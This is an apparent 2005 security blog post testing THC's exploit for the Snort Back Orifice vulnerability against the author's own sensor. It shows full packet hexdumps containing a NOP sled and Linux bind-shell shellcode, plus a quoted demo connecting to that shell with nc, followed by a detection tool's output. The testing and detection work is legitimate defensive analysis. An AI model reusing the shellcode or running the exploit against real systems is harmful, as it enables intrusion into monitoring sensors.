As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
1 | manual testing gcc with -O0
Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
2 | manual testing gcc with -O2
Sending exploit to 66.93.110.10
Done.
Here is what the traffic looks like:
09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1 ...;Z...]...U.O.
0x0430: 9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2 .w...wu)..c6.~!.
0x0440: 54ef 789e 77bd 491c 2ef1 71b6 0f90 9090 T.x.w.I...q.....
0x0450: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:
orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005
On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:
"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."
I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?
0 komentar:
Posting Komentar